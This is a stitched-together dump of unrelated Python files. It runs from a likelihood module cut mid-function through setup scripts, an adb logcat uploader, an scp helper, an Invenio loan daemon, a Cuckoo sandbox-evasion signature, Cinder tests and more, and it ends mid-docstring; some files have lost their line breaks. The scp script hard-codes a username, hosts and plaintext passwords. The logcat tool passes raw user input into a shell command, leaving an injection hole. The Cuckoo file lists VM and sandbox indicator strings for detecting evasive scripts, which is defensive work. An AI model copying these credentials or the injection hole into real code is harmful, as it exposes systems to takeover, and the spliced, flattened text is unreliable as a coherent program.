sqr = np.sqrt(4 * (alpha + alpha ** 2) * b * M + ((alpha + 1) * M - alpha * (o + b)) ** 2) B_mle = 1 / (2.0 * alpha * (1+alpha)) * (alpha * (o + b) - (alpha+1) * M + sqr) # Profile likelihood loglike = xlogy(o, alpha*B_mle + M) + xlogy(b, B_mle) - (alpha+1) * B_mle - M - \ logfactorial(b) - logfactorial(o) return loglike, B_mle * alpha def poisson_observed_gaussian_background(observed_counts, background_counts, background_error, expected_model_counts): # This loglike assume Gaussian errors on the background and Poisson uncertainties on the # observed counts. It is a profile likelihood. MB = background_counts + expected_model_counts s2 = background_error ** 2 # type: np.ndarray b = 0.5 * (np.sqrt(MB ** 2 - 2 * s2 * (MB - 2 * observed_counts) + background_error ** 4) + background_counts - expected_model_counts - s2) # type: np.ndarray # Now there are two branches: when the background is 0 we are in the normal situation of a pure # Poisson likelihood, while when the background is not zero we use the profile likelihood # NOTE: bkgErr can be 0 only when also bkgCounts = 0 # Also it is evident from the expression above that when bkgCounts = 0 and bkgErr=0 also b=0 # Let's do the branch with background > 0 first idx = background_counts > 0 log_likes = np.empty_like(expected_model_counts) log_likes[idx] = (-(b[idx] - background_counts[idx]) ** 2 / (2 * s2[idx]) + observed_counts[idx] * np.log(b[idx] + expected_model_counts[idx]) - b[idx] - expected_model_counts[idx] - logfactorial(observed_counts[idx]) - 0.5 * log(2 * np.pi) - np.log(background_error[idx])) # Let's do the other branch nidx = ~idx # the 1e-100 in the log is to avoid zero divisions # This is the Poisson likelihood with no background log_likes[nidx] = xlogy(observed_counts[nidx], expected_model_counts[nidx]) - \ expected_model_counts[nidx] - logfactorial(observed_counts[nidx]) return log_likes, b def half_chi2(y, yerr, expectation): # This is half of a chi2. The reason for the factor of two is that we need this to be the Gaussian likelihood, # so that the delta log-like for an error of say 1 sigma is 0.5 and not 1 like it would be for # the other likelihood functions. This way we can sum it with other likelihood functions. return 1/2.0 * (y-expectation)**2 / yerr**2
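# Worked example (illustration only, values rounded): for a single channel
# with observed_counts = 2, expected_bkg_counts = 1 and
# expected_model_counts = 1, poisson_log_likelihood_ideal_bkg gives
#
#   2 * log(2) - (1 + 1) - log(2!)  =  1.386 - 2 - 0.693  ~  -1.307
#
# per the formula quoted in its docstring.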
import codecs from os import path from setuptools import find_packages from setuptools import setup def read(*parts): filename = path.join(path.dirname(__file__), *parts) with codecs.open(filename, encoding="utf-8") as fp: return fp.read() install_requires = open('requirements.txt').read().split('\n') setup( author="Collabo Software Ltda", author_email="[email protected]", description="Abstraction to logical/soft delete in django models", name="soft-delete", long_description=read("README.md"), long_description_content_type='text/markdown', version="0.2.2", url="https://www.collabo.com.br/", license="MIT", packages=find_packages(exclude=("tests",)), install_requires=install_requires, package_data={ "models": [] }, classifiers=[ "Development Status :: 4 - Beta", "Environment :: Web Environment", "Framework :: Django", "Intended Audience :: Developers", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", "Programming Language :: Python", "Programming Language :: Python :: 2", "Programming Language :: Python :: 3", "Topic :: Software Development :: Libraries :: Python Modules", ] )
import os
import requests

from subprocess import Popen, PIPE, CalledProcessError
from threading import Timer
from framework.logging.logger import Logger
from datetime import datetime
from blessings import Terminal

t = Terminal()


class Logcat(object):

    def __init__(self):
        super(Logcat, self).__init__()

    @staticmethod
    def http_handler(output):
        """ Handler for submitting logs to the logcat web service """

        try:
            with open("{0}/framework/config".format(os.getcwd()), "r") as config:
                ip = config.readline()
                config.close()

            # Populate POST request
            # with output from
            # Logcat
            #
            data = {"data": output}

            # TODO - 07/26/2015
            # Remove hardcoded string and add to enums
            #
            r = requests.post("http://{0}:5000/services/logcat/update".format(ip.strip("\n")), data=data)

            if r.text == "Success":
                print(t.green("[{0}] ".format(datetime.now()) + t.yellow("Success!")))
            else:
                print(t.green("[{0}] ".format(datetime.now()) + t.red("Error! ") + "Check flask.log"))

        except IOError as e:
            print(t.red("[{0}] ".format(datetime.now()) + str(e)))
            Logger.run_logger(e)
        except requests.ConnectionError as e:
            print(t.red("[{0}] ".format(datetime.now()) + str(e)))
            Logger.run_logger(e)
        return

    def timeout(self, process):
        """ Callback to handle process timeouts """

        if process.poll() is None:
            print(t.green("[{0}] ".format(datetime.now()) + t.yellow("Gathering logs ...")))

            # Call
            # http_handler() with output
            #
            out = process.communicate()
            self.http_handler(out)

    def run_logcat(self):
        """ Run Logcat with a keyword search that dumps output """

        while True:
            result = raw_input(t.green("[{0}] ".format(datetime.now()) + t.yellow("Would you like to run Logcat? { Y || N } : ")))

            if result == "N":
                break
            elif result == "Y":
                keyword = raw_input(t.green("[{0}] ".format(datetime.now()) + t.yellow("Enter keyword search : ")))

                try:
                    p = Popen("adb logcat -d | grep {0}".format(keyword), stdout=PIPE, stderr=PIPE, shell=True)

                    # Create a new Timer()
                    # object and handle process timeouts
                    # with a callback
                    #
                    thread = Timer(3.0, self.timeout, [p])
                    thread.start()
                    thread.join()
                except CalledProcessError as e:
                    print(t.red("[{0}] ".format(datetime.now()) + str(e.returncode)))
                    Logger.run_logger(e.message)
                except IOError as e:
                    print(t.red("[{0}] ".format(datetime.now()) + e.message))
                    Logger.run_logger(e.message)
# -*- coding: utf-8 -*-


class Converter(object):
    def __init__(self):
        self.factor = {10: "X", 9: "IX", 5: "V", 4: "IV", 1: "I"}

    def convert(self, n):
        if n < 1:
            return ""
        arabic = sorted(list(filter(lambda e: e <= n, self.factor)))[-1]
        roman = self.factor.get(arabic)
        return roman + self.convert(n - arabic)


import unittest


class RomanNumberTest(unittest.TestCase):
    def setUp(self):
        self.converter = Converter()

    def test_converts_0(self):
        self.assertEqual("", self.converter.convert(0))

    def test_converts_1(self):
        self.assertEqual("I", self.converter.convert(1))

    def test_converts_5(self):
        self.assertEqual("V", self.converter.convert(5))

    def test_converts_2(self):
        self.assertEqual("II", self.converter.convert(2))

    def test_converts_4(self):
        self.assertEqual("IV", self.converter.convert(4))

    def test_converts_10(self):
        self.assertEqual("X", self.converter.convert(10))

    def test_converts_9(self):
        self.assertEqual("IX", self.converter.convert(9))

    def test_converts_29(self):
        self.assertEqual("XXIX", self.converter.convert(29))
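# A minimal test runner (not in the original file) so the unit tests above can
# be executed directly, e.g. with `python <this file>`:
if __name__ == '__main__':
    unittest.main()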
''' usage scphost.py put/get host file1 file2 ''' ## now copy the nightly regression pdf to online ## this is hosted on the astroaips machine import pexpect import sys Folder = False for i in range(len(sys.argv)): if sys.argv[i]=='help': print 'Usage: put/get host path/to/file1 path/to/file2' sys.exit() if sys.argv[i]=='-r': Folder = True file1 = sys.argv[3] file2 = sys.argv[4] hostname = sys.argv[2] if Folder: scp = "scp -r -oPubKeyAuthentication=no" else: scp= "scp -oPubKeyAuthentication=no" if hostname=='iridis': USER = "jm8g08" HOST = "iridis3_c.soton.ac.uk" PASS = "111Neverlose" HOME = "/home/jm8g08/" if hostname=='aips': USER = "jm8g08" HOST = "152.78.192.83" PASS = "11Neverlose" HOME = "/home/jm8g08/" if sys.argv[1]=='put': FILE = file1 REMOTE_FILE = HOME + file2 COMMAND = "%s %s %s@%s:%s" % (scp, FILE, USER, HOST, REMOTE_FILE) if sys.argv[1]=='get': FILE = file2 REMOTE_FILE = HOME + file1 COMMAND = "%s %s@%s:%s %s" % (scp, USER, HOST, REMOTE_FILE, FILE) print COMMAND child = pexpect.spawn(COMMAND) child.expect('password:') child.sendline(PASS) child.expect(pexpect.EOF)
# -*- coding: utf-8 -*- ## ## This file is part of Invenio. ## Copyright (C) 2008, 2009, 2010, 2011 CERN. ## ## Invenio is free software; you can redistribute it and/or ## modify it under the terms of the GNU General Public License as ## published by the Free Software Foundation; either version 2 of the ## License, or (at your option) any later version. ## ## Invenio is distributed in the hope that it will be useful, but ## WITHOUT ANY WARRANTY; without even the implied warranty of ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ## General Public License for more details. ## ## You should have received a copy of the GNU General Public License ## along with Invenio; if not, write to the Free Software Foundation, Inc., ## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA. """ BibCirculation daemon. """ __revision__ = "$Id$" import sys import datetime import time from invenio.dbquery import run_sql from invenio.bibtask import task_init from invenio.mailutils import send_email import invenio.bibcirculation_dblayer as db from invenio.bibcirculation_config import CFG_BIBCIRCULATION_TEMPLATES, \ CFG_BIBCIRCULATION_LIBRARIAN_EMAIL from invenio.search_engine import get_fieldvalues from invenio.bibcirculation_utils import generate_email_body def get_expired_loan(): """ @return all expired loans """ res = run_sql("""select id_crcBORROWER, id, id_bibrec from crcLOAN where status = 'on loan' and due_date < NOW() """) return res def update_expired_loan(loan_id): """ Update status, number of overdue letter and date of overdue letter @param loan_id: identify the loan. Primary key of crcLOAN. @type loan_id: int """ run_sql("""update crcLOAN set overdue_letter_number = overdue_letter_number + 1, status = 'expired', overdue_letter_date = NOW() where id = %s """, (loan_id, )) def get_overdue_letters_info(loan_id): """ Get the number of letters and the date of the last letter sent for a given loan_id. @param loan_id: identify the loan. Primary of crcLOAN. @type loan_id: int @return number_of_letters and date of the last letter """ res = run_sql("""select overdue_letter_number, DATE_FORMAT(overdue_letter_date,'%%Y-%%m-%%d') from crcLOAN where id=%s""", (loan_id, )) return res[0] def send_overdue_letter(borrower_id, subject, content): """ Send an overdue letter @param borrower_id: identify the borrower. Primary key of crcBORROWER. @type borrower_id: int @param subject: subject of the overdue letter @type subject: string """ to_borrower = db.get_borrower_email(borrower_id) send_email(fromaddr=CFG_BIBCIRCULATION_LIBRARIAN_EMAIL, toaddr=to_borrower, subject=subject, content=content, header='', footer='', attempt_times=1, attempt_sleeptime=10 ) return 1 def send_second_recall(date_letters): """ @param date_letters: date of the last letter. @type date_letters: string @return boolean """ today = datetime.date.today() time_tuple = time.strptime(date_letters, "%Y-%m-%d") #datetime.strptime(date_letters, "%Y-%m-%d") doesn't work (only on 2.5). tmp_date = datetime.datetime(*time_tuple[0:3]) + datetime.timedelta(weeks=1) if tmp_date.strftime("%Y-%m-%d") == today.strftime("%Y-%m-%d"): return True else: return False def send_third_recall(date_letters): """ @param date_letters: date of the last letter. @type date_letters: string @return boolean """ today = datetime.date.today() time_tuple = time.strptime(date_letters, "%Y-%m-%d") #datetime.strptime(date_letters, "%Y-%m-%d") doesn't work (only on 2.5). 
tmp_date = datetime.datetime(*time_tuple[0:3]) + datetime.timedelta(days=3) if tmp_date.strftime("%Y-%m-%d") == today.strftime("%Y-%m-%d"): return True else: return False def task_run_core(): """ run daemon """ #write_message("Getting expired loans ...", verbose=9) expired_loans = get_expired_loan() for (borrower_id, loan_id, recid) in expired_loans: (number_of_letters, date_letters) = get_overdue_letters_info(loan_id) if number_of_letters == 0: content = generate_email_body(CFG_BIBCIRCULATION_TEMPLATES['RECALL1'], loan_id) elif number_of_letters == 1 and send_second_recall(date_letters): content = generate_email_body(CFG_BIBCIRCULATION_TEMPLATES['RECALL2'], loan_id) elif number_of_letters == 2 and send_third_recall(date_letters): content = generate_email_body(CFG_BIBCIRCULATION_TEMPLATES['RECALL3'], loan_id) else: content = generate_email_body(CFG_BIBCIRCULATION_TEMPLATES['RECALL3'], loan_id) title = ''.join(get_fieldvalues(recid, "245__a")) subject = "LOAN RECALL: " + title update_expired_loan(loan_id) #write_message("Updating information about expired loans") send_overdue_letter(borrower_id, subject, content) #write_message("Sending overdue letter") #write_message("Done!!") return 1 def main(): """ main() """ task_init(authorization_action='runbibcirculation', authorization_msg="BibCirculation Task Submission", description="""Examples: %s -u admin """ % (sys.argv[0],), version=__revision__, task_run_fnc = task_run_core) if __name__ == '__main__': main()
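# Worked example (illustration only): with the recall rules above, a first
# overdue letter dated '2011-03-01' makes send_second_recall() return True
# exactly one week later (on 2011-03-08), and once a second letter has been
# sent, send_third_recall() returns True three days after that letter's date.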
# -*- coding: utf-8 -*- # Copyright (C) 2015 Kevin Ross # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. from lib.cuckoo.common.abstracts import Signature class Virtualcheck_JS(Signature): name = "virtualcheck_js" description = "执行伪装过的JavaScript检查是否存在沙盒(sandbox)系统或虚拟机(VM)环境" weight = 3 severity = 3 categories = ["exploit_kit", "evasion"] authors = ["Kevin Ross"] minimum = "1.3" evented = True def __init__(self, *args, **kwargs): Signature.__init__(self, *args, **kwargs) filter_categories = set(["browser"]) # backward compat filter_apinames = set(["JsEval", "COleScript_Compile", "COleScript_ParseScriptText"]) def on_call(self, call, process): indicators = [ "vmusbmouse", "vmhgfs", "vboxguest", "vboxmouse", "vmmouse", "vm3dmp", "prl_boot", "prl_fs", "prl_kmdd", "prl_memdev", "prl_mouf", "prl_pv32", "prl_sound", "prl_prl_strg", "prl_tg", "prl_time", "Kaspersky.IeVirtualKeyboardPlugin", "isPhantom", "isNodeJs", "isCouchJs", "isRhino", "isDebugger" ] if call["api"] == "JsEval": buf = self.get_argument(call, "Javascript") else: buf = self.get_argument(call, "Script") for indicator in indicators: if indicator in buf.lower(): return True
from chll import create, merge raw_data = [ 'eNrt0TENACAAA8GOTAQdqEQKAhCJA8JIwp2C5pukJn0FAACAk/nmrOKZ7zQJgIcMCQAAAAAAuLYBWvQCHQ==', 'eNrt0FERABAAQLEXwAkipUBCauF8bBFWzVonAAAAAOCBoQCAj2wFAAAAwDMXioMBcQ==', 'eNrt0DERgDAURMFj6CgQQoWESEHKF4RI2ggIpGBXwN3MS7Inxx1esw1ZKSEBAAB6pwQAdJbSAAAARlg/f2yiA/BDlwQzlQQTPQXRA0M=', 'eNrt2bEJwCAARcEflJTiHM7ukLa2gYAIdyO89iVpyZgBAACqBAAAnzwSAFyqSHCNLgEAwO6VAOAvR/74AgjYAQc=', 'eNrt0DENACAQALFL2BHy2hGJBdhbCa12zQkAAAAAAAAAAACAH0vBuwsy6wDo', 'eNrt2CEBACEABMGjABnQn4ZIBCIkFvsSmImw4sQlqck3AwAA5ygSXKRLgD0CADjHkACAtzUJfvOeAFhTgM0CfdoB2Q==', 'eNrt0sEJgDAQBMBVfAaxjrwsIaWlIIu0Ax+CEMlMBXu7l2RP6hWaCgAAgE+dP8u7dJsB8NqqAgAY0KECAOBJm+HIbYopi28GhnUDcbYCOA==', 'eNrt0bENgDAUQ0GHpEQMkikzEEMyQRpE88XdBNZzkiuZd6CeQwIAgF9pEnxpSLB1SgAAUFOvPX95EAAAAGpotr33ABMZAX0=', 'eNrtyjEBACAQAKFLYBCzfwijWUF3mKlW7QkAAAAAAAAAAAAA/pzXeAFOJAGl', 'eNrt0AENACAQAKGbAQzy2Q1pDecgAtWuOcGHlgIAAAAAAAAAAAB4wgV/DADn', ] for i, r in enumerate(raw_data): raw_data[i] = r.decode('base64').decode('zlib') def do(): counters = [create(r) for r in raw_data] result = merge(counters).cardinality() assert result == 46, result if __name__ == '__main__': do()
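# Portability note (an assumption, illustration only): str.decode('base64')
# and str.decode('zlib') exist on Python 2 only. An equivalent decoding step
# on Python 3 would look roughly like:
#
#   import base64, zlib
#   raw_data[i] = zlib.decompress(base64.b64decode(r))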
#!/usr/bin/env python # -*- coding: utf-8 -*- # # Copyright 2018 João Pedro Rodrigues # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Splits a PDB file into several, each containing one chain. Usage: python pdb_splitchain.py <pdb file> Example: python pdb_splitchain.py 1CTF.pdb This program is part of the `pdb-tools` suite of utilities and should not be distributed isolatedly. The `pdb-tools` were created to quickly manipulate PDB files using the terminal, and can be used sequentially, with one tool streaming data to another. They are based on old FORTRAN77 code that was taking too much effort to maintain and compile. RIP. """ import os import sys __author__ = "Joao Rodrigues" __email__ = "[email protected]" USAGE = __doc__.format(__author__, __email__) def check_input(args): """Checks whether to read from stdin/file and validates user input/options. """ # Defaults fh = sys.stdin # file handle if not len(args): # Reading from pipe with default option if sys.stdin.isatty(): sys.stderr.write(__doc__) sys.exit(1) elif len(args) == 1: if not os.path.isfile(args[0]): emsg = 'ERROR!! File not found or not readable: \'{}\'\n' sys.stderr.write(emsg.format(args[0])) sys.stderr.write(__doc__) sys.exit(1) fh = open(args[0], 'r') else: # Whatever ... emsg = 'ERROR!! Script takes 1 argument, not \'{}\'\n' sys.stderr.write(emsg.format(len(args))) sys.stderr.write(__doc__) sys.exit(1) return fh def split_chain(fhandle): """Splits the contents of the PDB file into new files, each containing a chain of the original file """ fname_root = fhandle.name[:-4] if fhandle.name != '<stdin>' else 'output' basename = os.path.basename(fname_root) chain_data = {} # {chain_id: lines} prev_chain = None records = ('ATOM', 'HETATM', 'ANISOU', 'TER') for line in fhandle: if line.startswith(records): line_chain = line[21] if line_chain != prev_chain: if line_chain not in chain_data: chain_data[line_chain] = [] prev_chain = line_chain chain_data[line_chain].append(line) for chain_id in sorted(chain_data.keys()): lines = chain_data[chain_id] with open(basename + '_' + chain_id + '.pdb', 'w') as fh: fh.write(''.join(lines)) def main(): # Check Input pdbfh = check_input(sys.argv[1:]) # Do the job split_chain(pdbfh) # last line of the script # We can close it even if it is sys.stdin pdbfh.close() sys.exit(0) if __name__ == '__main__': main()
''' File name: config.py Author: [email protected] Date created: 2015-03-15 12:35:32 Date last modified: 2015-03-15 13:04:20 Python Version: 2.7.6 ''' import os from singleton import singleton import ConfigParser @singleton class Config(): bin_path = './' host = '127.0.0.1' port = 8080 xmpp_server = '127.0.0.1' xmpp_user = '' xmpp_password = '' mysql_host = '' mysql_database = '' mysql_user = '' mysql_pass = '' debug = False log_color = False def load(self, config): if not os.path.isfile(config): print " * Error parsing config: FILE NOT EXIST. Using default config." else: conf = ConfigParser.ConfigParser() conf.read(config) self.host = conf.get('server', 'host') self.port = conf.getint('server', 'port') self.xmpp_server = conf.get('xmpp', 'xmpp_server') self.xmpp_user = conf.get('xmpp', 'xmpp_user') self.xmpp_password = conf.get('xmpp', 'xmpp_password') self.mysql_host = conf.get('mysql', 'mysql_host') self.mysql_database = conf.get('mysql', 'mysql_database') self.mysql_user = conf.get('mysql', 'mysql_user') self.mysql_pass = conf.get('mysql', 'mysql_pass') self.debug = conf.getboolean('extra', 'debug') self.log_color = conf.getboolean('extra', 'log_color') config = Config();
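# Illustrative sketch (an assumption): the ConfigParser layout that
# Config.load() above expects, e.g. a file such as:
#
#   [server]
#   host = 0.0.0.0
#   port = 8080
#
#   [xmpp]
#   xmpp_server = 127.0.0.1
#   xmpp_user = bot
#   xmpp_password = secret
#
#   [mysql]
#   mysql_host = localhost
#   mysql_database = app
#   mysql_user = app
#   mysql_pass = secret
#
#   [extra]
#   debug = true
#   log_color = false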
"""Build the tutorial data files from the IMDB *.list.gz files.""" import csv import gzip import os import re from datetime import datetime split_on_tabs = re.compile(b'\t+').split def main(): os.chdir(os.path.dirname(os.path.abspath(__file__))) if not os.path.isdir('../data'): os.makedirs('../data') # Load movie titles. titles = set() uninteresting_titles = set() lines = iter(gzip.open('genres.list.gz')) line = next(lines) while line != b'8: THE GENRES LIST\n': line = next(lines) assert next(lines) == b'==================\n' assert next(lines) == b'\n' print('Reading "genres.list.gz" to find interesting movies') for line in lines: if not_a_real_movie(line): continue fields = split_on_tabs(line.strip(b'\n')) raw_title = fields[0] genre = fields[1] try: raw_title.decode('ascii') except UnicodeDecodeError: continue if genre in (b'Adult', b'Documentary', b'Short'): uninteresting_titles.add(raw_title) else: titles.add(raw_title) interesting_titles = titles - uninteresting_titles del titles del uninteresting_titles print('Found {0} titles'.format(len(interesting_titles))) print('Writing "titles.csv"') with open('../data/titles.csv', 'w') as f: output = csv.writer(f) output.writerow(('title', 'year')) for raw_title in interesting_titles: title_and_year = parse_title(raw_title) output.writerow(title_and_year) print('Finished writing "titles.csv"') print('Reading release dates from "release-dates.list.gz"') lines = iter(gzip.open('release-dates.list.gz')) line = next(lines) while line != b'RELEASE DATES LIST\n': line = next(lines) assert next(lines) == b'==================\n' output = csv.writer(open('../data/release_dates.csv', 'w')) output.writerow(('title', 'year', 'country', 'date')) for line in lines: if not_a_real_movie(line): continue if line.startswith(b'----'): continue fields = split_on_tabs(line.strip(b'\n')) if len(fields) > 2: # ignore "DVD premier" lines and so forth continue raw_title = fields[0] if raw_title not in interesting_titles: continue title, year = parse_title(raw_title) if title is None: continue country, datestr = fields[1].decode('ascii').split(':') try: date = datetime.strptime(datestr, '%d %B %Y').date() except ValueError: continue # incomplete dates like "April 2014" output.writerow((title, year, country, date)) print('Finished writing "release_dates.csv"') output = csv.writer(open('../data/cast.csv', 'w')) output.writerow(('title', 'year', 'name', 'type', 'character', 'n')) for role_type, filename in ( ('actor', 'actors.list.gz'), ('actress', 'actresses.list.gz'), ): print('Reading {0!r}'.format(filename)) lines = iter(gzip.open(filename)) line = next(lines) while (b'Name' not in line) or (b'Titles' not in line): line = next(lines) assert b'----' in next(lines) for line in lines: if line.startswith(b'----------------------'): break line = line.rstrip() if not line: continue fields = split_on_tabs(line.strip(b'\n')) if fields[0]: name = decode_ascii(fields[0]) name = swap_names(name) if not_a_real_movie(fields[1]): continue fields = fields[1].split(b' ') raw_title = fields[0] if raw_title not in interesting_titles: continue if len(fields) < 2: continue if fields[1].startswith(b'('): # uncredited, archive footage, etc del fields[1] if len(fields) < 2: continue if not fields[1].startswith(b'['): continue character = decode_ascii(fields[1].strip(b'[]')) if len(fields) > 2 and fields[2].startswith(b'<'): n = int(fields[2].strip(b'<>')) else: n = '' title, year = parse_title(raw_title) if title is None: continue if character == 'N/A': clist = ['(N/A)'] else: clist = 
character.split('/') for character in clist: if not character: continue output.writerow((title, year, name, role_type, character, n)) print('Finished writing "cast.csv"') def not_a_real_movie(line): return ( line.startswith(b'"') # TV show or b'{' in line # TV episode or b' (????' in line # Unknown year or b' (TV)' in line # TV Movie or b' (V)' in line # Video or b' (VG)' in line # Video game ) match_title = re.compile(r'^(.*) \((\d+)(/[IVXL]+)?\)$').match def parse_title(raw_title): try: title = raw_title.decode('ascii') except UnicodeDecodeError: return None, None m = match_title(title) title = m.group(1) year = int(m.group(2)) numeral = m.group(3) if numeral is not None: numeral = numeral.strip('/') if numeral != 'I': title = '{0} ({1})'.format(title, numeral) return title, year def swap_names(name): if name.endswith(' (I)'): name = name[:-4] if ',' in name: last, first = name.split(',', 1) name = first.strip() + ' ' + last.strip() return name def decode_ascii(s): return s.decode('ascii', 'replace').replace(u'\ufffd', u'?') if __name__ == '__main__': main()
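# Worked examples for parse_title() above (illustration only):
#
#   parse_title(b'Blade Runner (1982)')     -> ('Blade Runner', 1982)
#   parse_title(b'Frankenstein (1910/I)')   -> ('Frankenstein', 1910)
#   parse_title(b'Frankenstein (1910/II)')  -> ('Frankenstein (II)', 1910)
#
# Raw titles that fail to decode as ASCII return (None, None).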
# Copyright 2014 IBM Corp. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import mock from oslo_serialization import jsonutils import webob from cinder import context from cinder import exception from cinder import test from cinder.tests.api import fakes def app(): # no auth, just let environ['cinder.context'] pass through api = fakes.router.APIRouter() mapper = fakes.urlmap.URLMap() mapper['/v2'] = api return mapper def db_service_get_by_host_and_topic(context, host, topic): """Replacement for db.service_get_by_host_and_topic. We stub the db.service_get_by_host_and_topic method to return something for a specific host, and raise an exception for anything else. We don't use the returned data (the code under test just use the call to check for existence of a host, so the content returned doesn't matter. """ if host == 'host_ok': return {} raise exception.ServiceNotFound(service_id=host) # Some of the tests check that volume types are correctly validated during a # volume manage operation. This data structure represents an existing volume # type. fake_vt = {'id': 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa', 'name': 'good_fakevt'} def vt_get_volume_type_by_name(context, name): """Replacement for cinder.volume.volume_types.get_volume_type_by_name. Overrides cinder.volume.volume_types.get_volume_type_by_name to return the volume type based on inspection of our fake structure, rather than going to the Cinder DB. """ if name == fake_vt['name']: return fake_vt raise exception.VolumeTypeNotFoundByName(volume_type_name=name) def vt_get_volume_type(context, vt_id): """Replacement for cinder.volume.volume_types.get_volume_type. Overrides cinder.volume.volume_types.get_volume_type to return the volume type based on inspection of our fake structure, rather than going to the Cinder DB. """ if vt_id == fake_vt['id']: return fake_vt raise exception.VolumeTypeNotFound(volume_type_id=vt_id) def api_manage(*args, **kwargs): """Replacement for cinder.volume.api.API.manage_existing. Overrides cinder.volume.api.API.manage_existing to return some fake volume data structure, rather than initiating a real volume managing. Note that we don't try to replicate any passed-in information (e.g. name, volume type) in the returned structure. 
""" vol = { 'status': 'creating', 'display_name': 'fake_name', 'availability_zone': 'nova', 'tenant_id': 'fake', 'created_at': 'DONTCARE', 'id': 'ffffffff-0000-ffff-0000-ffffffffffff', 'volume_type': None, 'snapshot_id': None, 'user_id': 'fake', 'launched_at': 'DONTCARE', 'size': 0, 'attach_status': 'detached', 'volume_type_id': None} return vol @mock.patch('cinder.db.service_get_by_host_and_topic', db_service_get_by_host_and_topic) @mock.patch('cinder.volume.volume_types.get_volume_type_by_name', vt_get_volume_type_by_name) @mock.patch('cinder.volume.volume_types.get_volume_type', vt_get_volume_type) class VolumeManageTest(test.TestCase): """Test cases for cinder/api/contrib/volume_manage.py The API extension adds a POST /os-volume-manage API that is passed a cinder host name, and a driver-specific reference parameter. If everything is passed correctly, then the cinder.volume.api.API.manage_existing method is invoked to manage an existing storage object on the host. In this set of test cases, we are ensuring that the code correctly parses the request structure and raises the correct exceptions when things are not right, and calls down into cinder.volume.api.API.manage_existing with the correct arguments. """ def setUp(self): super(VolumeManageTest, self).setUp() def _get_resp(self, body): """Helper to execute an os-volume-manage API call.""" req = webob.Request.blank('/v2/fake/os-volume-manage') req.method = 'POST' req.headers['Content-Type'] = 'application/json' req.environ['cinder.context'] = context.RequestContext('admin', 'fake', True) req.body = jsonutils.dumps(body) res = req.get_response(app()) return res @mock.patch('cinder.volume.api.API.manage_existing', wraps=api_manage) def test_manage_volume_ok(self, mock_api_manage): """Test successful manage volume execution. Tests for correct operation when valid arguments are passed in the request body. We ensure that cinder.volume.api.API.manage_existing got called with the correct arguments, and that we return the correct HTTP code to the caller. """ body = {'volume': {'host': 'host_ok', 'ref': 'fake_ref'}} res = self._get_resp(body) self.assertEqual(res.status_int, 202, res) # Check that the manage API was called with the correct arguments. self.assertEqual(mock_api_manage.call_count, 1) args = mock_api_manage.call_args[0] self.assertEqual(args[1], body['volume']['host']) self.assertEqual(args[2], body['volume']['ref']) def test_manage_volume_missing_host(self): """Test correct failure when host is not specified.""" body = {'volume': {'ref': 'fake_ref'}} res = self._get_resp(body) self.assertEqual(res.status_int, 400) def test_manage_volume_missing_ref(self): """Test correct failure when the ref is not specified.""" body = {'volume': {'host': 'host_ok'}} res = self._get_resp(body) self.assertEqual(res.status_int, 400) pass @mock.patch('cinder.volume.api.API.manage_existing', api_manage) def test_manage_volume_volume_type_by_uuid(self): """Tests for correct operation when a volume type is specified by ID. We wrap cinder.volume.api.API.manage_existing so that managing is not actually attempted. """ body = {'volume': {'host': 'host_ok', 'ref': 'fake_ref', 'volume_type': 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'}} res = self._get_resp(body) self.assertEqual(res.status_int, 202, res) pass @mock.patch('cinder.volume.api.API.manage_existing', api_manage) def test_manage_volume_volume_type_by_name(self): """Tests for correct operation when a volume type is specified by name. 
We wrap cinder.volume.api.API.manage_existing so that managing is not actually attempted. """ body = {'volume': {'host': 'host_ok', 'ref': 'fake_ref', 'volume_type': 'good_fakevt'}} res = self._get_resp(body) self.assertEqual(res.status_int, 202, res) pass def test_manage_volume_bad_volume_type_by_uuid(self): """Test failure on nonexistent volume type specified by ID.""" body = {'volume': {'host': 'host_ok', 'ref': 'fake_ref', 'volume_type': 'bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb'}} res = self._get_resp(body) self.assertEqual(res.status_int, 404, res) pass def test_manage_volume_bad_volume_type_by_name(self): """Test failure on nonexistent volume type specified by name.""" body = {'volume': {'host': 'host_ok', 'ref': 'fake_ref', 'volume_type': 'bad_fakevt'}} res = self._get_resp(body) self.assertEqual(res.status_int, 404, res) pass
# Copyright Pyjamas Team # Copyright (C) 2009 Luke Kenneth Casson Leighton <[email protected]> # # Licensed under the Apache License, Version 2.0 (the "License"); you may not # use this file except in compliance with the License. You may obtain a copy of # the License at # # http:/www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations under # the License. import sys from pyjamas import DOM from pyjamas import Factory from pyjamas.ui import Event from ButtonBase import ButtonBase from pyjamas.ui import Focus from UIObject import UIObject """ Custom Button is a base button class with built in support for a set number of button faces. Each face has its own style modifier. For example, the state for down and hovering is assigned the CSS modifier down-hovering. So, if the button's overall style name is gwt-PushButton then when showing the down-hovering face, the button's style is gwt-PushButton-down-hovering. The overall style name can be used to change the style of the button irrespective of the current face. Each button face can be assigned is own image, text, or html contents. If no content is defined for a face, then the face will use the 